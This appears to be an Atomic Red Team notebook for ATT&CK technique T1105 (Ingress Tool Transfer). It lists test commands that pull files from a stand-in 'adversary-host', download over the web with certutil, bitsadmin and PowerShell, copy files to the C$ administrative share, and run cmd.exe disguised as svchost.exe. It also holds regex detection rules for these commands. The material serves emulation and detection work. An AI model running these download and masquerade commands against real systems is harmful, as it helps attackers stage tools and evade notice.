{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1105 - Ingress Tool Transfer",
    "\n",
    "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "# Import the module before running the tests.\n# Check out the Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 -Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - rsync remote file copy (push)\nUtilize rsync to perform a remote file copy (push)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nrsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 1"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #2 - rsync remote file copy (pull)\nUtilize rsync to perform a remote file copy (pull)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nrsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 2"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #3 - scp remote file copy (push)\nUtilize scp to perform a remote file copy (push)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nscp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 3"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #4 - scp remote file copy (pull)\nUtilize scp to perform a remote file copy (pull)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nscp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 4"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #5 - sftp remote file copy (push)\nUtilize sftp to perform a remote file copy (push)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nsftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 5"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #6 - sftp remote file copy (pull)\nUtilize sftp to perform a remote file copy (pull)\n\n**Supported Platforms:** linux, macos\n#### Attack Commands: Run with `bash`\n```bash\nsftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 6"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #7 - certutil download (urlcache)\nUse the certutil -urlcache argument to download a file from the web. Note - /urlcache also works!\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\ncmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 7"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #8 - certutil download (verifyctl)\nUse the certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! certutil names the split output after the blob it fetched, so the last line renames whatever non-.txt file appeared in the dated directory.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\n$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 8"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #9 - Windows - BITSAdmin BITS Download\nThis test uses BITSAdmin.exe to schedule a BITS job for the download of a file.\nThis technique is used by Qbot malware to download payloads.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nC:\\Windows\\System32\\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt %temp%\\Atomic-license.txt\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 9"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #10 - Windows - PowerShell Download\nThis test uses PowerShell to download a payload.\nThis technique is used by multiple adversaries and malware families.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\n(New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\", \"$env:TEMP\\Atomic-license.txt\")\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 10"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #11 - OSTAP Worming Activity\nOSTap copies itself in a specific way to shares and secondary drives. This test emulates that activity by changing into the `\\\\localhost\\C$` administrative share and writing a JScript file there.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\npushd \\\\localhost\\C$\necho var fileObject = WScript.createobject(\"Scripting.FileSystemObject\");var newfile = fileObject.CreateTextFile(\"AtomicTestFileT1105.js\", true);newfile.WriteLine(\"This is an atomic red team test file for T1105. It simulates how OSTap worms across network shares and drives.\");newfile.Close(); > AtomicTestT1105.js\nCScript.exe AtomicTestT1105.js //E:JScript\ndel AtomicTestT1105.js /Q >nul 2>&1\ndel AtomicTestFileT1105.js /Q >nul 2>&1\npopd\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 11"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #12 - svchost writing a file to a UNC path\nA process named svchost.exe writes a non-Microsoft Office file to a UNC path.\nUpon successful execution, this copies cmd.exe to `C:\\svchost.exe` and runs that copy as svchost.exe with its output redirected to a txt file on the `\\\\localhost\\c$` administrative share.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\ncopy C:\\Windows\\System32\\cmd.exe C:\\svchost.exe\nC:\\svchost.exe /c echo T1105 > \\\\localhost\\c$\\T1105.txt\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1105 -TestNumbers 12"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Monitor for file creation and for files transferred into the network. An unusual process that holds an external network connection and creates files on the system may be suspicious, as is the use of utilities, such as FTP, that do not normally occur in the environment.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server; for ingress tool transfer the telling flow is usually the reverse, a host pulling a large file from a server it has never contacted before). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)"
   ]
  },
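  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Added example: triaging process-creation events for T1105 primitives\n",
    "\n",
    "The detection guidance above is easiest to act on as a set of command-line rules applied to process-creation telemetry. The PowerShell below is an added example, not code from Atomic Red Team or ATT&CK: it defines regex rules for the download and copy primitives exercised by the tests on this page (certutil `-urlcache`/`-verifyctl`, `bitsadmin /transfer`, `WebClient.DownloadFile`, an `svchost.exe` running outside `System32`/`SysWOW64`, writes to a `\\\\host\\C$` administrative share, and `scp`/`rsync`/`sftp` with a `user@host:` remote) and runs them over constructed Sysmon Event ID 1 style records. The rule names, the event shape (`Host`, `Image`, `CommandLine`) and every sample command line are assumptions for illustration; in a lab you would feed it `Get-WinEvent` output or an EDR export instead.\n",
    "\n",
    "```powershell\n",
    "# Added example (not Atomic Red Team code): command-line rules for the T1105\n",
    "# primitives used by the tests above, run over constructed Sysmon-style events.\n",
    "# Rule names, event fields and sample values are assumptions for illustration.\n",
    "\n",
    "$Rules = @(\n",
    "    @{ Name = 'certutil urlcache/verifyctl download'\n",
    "       Image = 'certutil\\.exe$'\n",
    "       CommandLine = '[-/](urlcache|verifyctl)\\b.*\\bhttps?://' },\n",
    "    @{ Name = 'bitsadmin transfer job'\n",
    "       Image = 'bitsadmin\\.exe$'\n",
    "       CommandLine = '/transfer\\b.*\\bhttps?://' },\n",
    "    @{ Name = 'PowerShell WebClient download'\n",
    "       Image = '(powershell|pwsh)\\.exe$'\n",
    "       CommandLine = 'Net\\.WebClient.*\\.Download(File|String|Data)\\(' },\n",
    "    @{ Name = 'svchost.exe outside System32/SysWOW64'\n",
    "       Image = '^(?!C:\\\\Windows\\\\(System32|SysWOW64)\\\\).*\\\\svchost\\.exe$'\n",
    "       CommandLine = '.' },\n",
    "    @{ Name = 'write to administrative share'\n",
    "       Image = '.'\n",
    "       CommandLine = '\\\\\\\\[^\\\\]+\\\\[a-z]\\$\\\\' },\n",
    "    @{ Name = 'scp/rsync/sftp with remote host'\n",
    "       Image = '(scp|rsync|sftp)$'\n",
    "       CommandLine = '\\S+@[\\w.-]+:' }\n",
    ")\n",
    "\n",
    "function Find-T1105Indicators {\n",
    "    # Emits one row per event that matches at least one rule. PowerShell's\n",
    "    # -match is case-insensitive by default, so the patterns need no (?i).\n",
    "    param([Parameter(Mandatory)][object[]]$Events)\n",
    "    foreach ($e in $Events) {\n",
    "        $hits = foreach ($r in $Rules) {\n",
    "            if ($e.Image -match $r.Image -and $e.CommandLine -match $r.CommandLine) { $r.Name }\n",
    "        }\n",
    "        if ($hits) {\n",
    "            [pscustomobject]@{\n",
    "                Host        = $e.Host\n",
    "                Image       = $e.Image\n",
    "                Rules       = ($hits -join '; ')\n",
    "                CommandLine = $e.CommandLine\n",
    "            }\n",
    "        }\n",
    "    }\n",
    "}\n",
    "\n",
    "# Constructed sample events: the first seven mirror tests on this page,\n",
    "# the last three are benign look-alikes that must not fire.\n",
    "$events = @(\n",
    "    [pscustomobject]@{ Host = 'WS01'; Image = 'C:\\\\Windows\\\\System32\\\\certutil.exe'\n",
    "        CommandLine = 'certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt' },\n",
    "    [pscustomobject]@{ Host = 'WS01'; Image = 'C:\\\\Windows\\\\System32\\\\certutil.exe'\n",
    "        CommandLine = 'certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt' },\n",
    "    [pscustomobject]@{ Host = 'WS01'; Image = 'C:\\\\Windows\\\\System32\\\\bitsadmin.exe'\n",
    "        CommandLine = 'C:\\\\Windows\\\\System32\\\\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt C:\\\\Users\\\\lab\\\\AppData\\\\Local\\\\Temp\\\\Atomic-license.txt' },\n",
    "    [pscustomobject]@{ Host = 'WS01'; Image = 'C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\n",
    "        CommandLine = 'powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\", \"$env:TEMP\\\\Atomic-license.txt\")' },\n",
    "    [pscustomobject]@{ Host = 'WS01'; Image = 'C:\\\\svchost.exe'\n",
    "        CommandLine = 'C:\\\\svchost.exe /c echo T1105 > \\\\\\\\localhost\\\\c$\\\\T1105.txt' },\n",
    "    [pscustomobject]@{ Host = 'lx01'; Image = '/usr/bin/scp'\n",
    "        CommandLine = 'scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/' },\n",
    "    [pscustomobject]@{ Host = 'lx01'; Image = '/usr/bin/rsync'\n",
    "        CommandLine = 'rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files' },\n",
    "    [pscustomobject]@{ Host = 'WS01'; Image = 'C:\\\\Windows\\\\System32\\\\svchost.exe'\n",
    "        CommandLine = 'C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs -p' },   # benign service host\n",
    "    [pscustomobject]@{ Host = 'WS01'; Image = 'C:\\\\Windows\\\\System32\\\\certutil.exe'\n",
    "        CommandLine = 'certutil -hashfile C:\\\\tools\\\\installer.msi SHA256' },   # benign, no URL\n",
    "    [pscustomobject]@{ Host = 'lx01'; Image = '/usr/bin/rsync'\n",
    "        CommandLine = 'rsync -a /var/backups/ /mnt/backup/' }   # benign, local copy only\n",
    ")\n",
    "\n",
    "Find-T1105Indicators -Events $events | Format-Table Host, Rules, CommandLine -AutoSize -Wrap\n",
    "```\n",
    "\n",
    "Run as written it prints seven rows: the five Windows records that correspond to Atomic Tests #7 through #10 and #12, and the two Unix records that correspond to Tests #3 and #1. The Test #12 record matches two rules at once (`svchost.exe` outside `System32` and the write to `\\\\localhost\\c$`), which is the kind of overlap worth scoring higher. The three benign records (the real service host under `System32`, `certutil -hashfile`, and an `rsync` between two local paths) produce no rows, because each rule keys on the remote or download-specific part of the command line rather than on the binary name alone."
   ]
  },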
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Shield Active Defense\n### PCAP Collection \n Collect full network traffic for future research and analysis. \n\n PCAP Collection allows defenders to use the data to examine an adversary\u2019s network traffic more closely, including studying whether it is encoded and/or encrypted. PCAP can be run through tools to replay the traffic to get a real-time view of what happened over the wire. These tools can also parse the traffic and send results to a SIEM for monitoring and alerting.\n#### Opportunity\nThere is an opportunity to collect network data and analyze the adversary activity it contains.\n#### Use Case\nCollecting full packet capture of all network traffic allows you to review what happened over the connection and identify command and control traffic and/or exfiltration activity; for this technique, that includes recovering the transferred tool itself when the channel is unencrypted.\n#### Procedures\nCollect PCAP on a decoy network to improve visibility into an adversary's network activity."
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}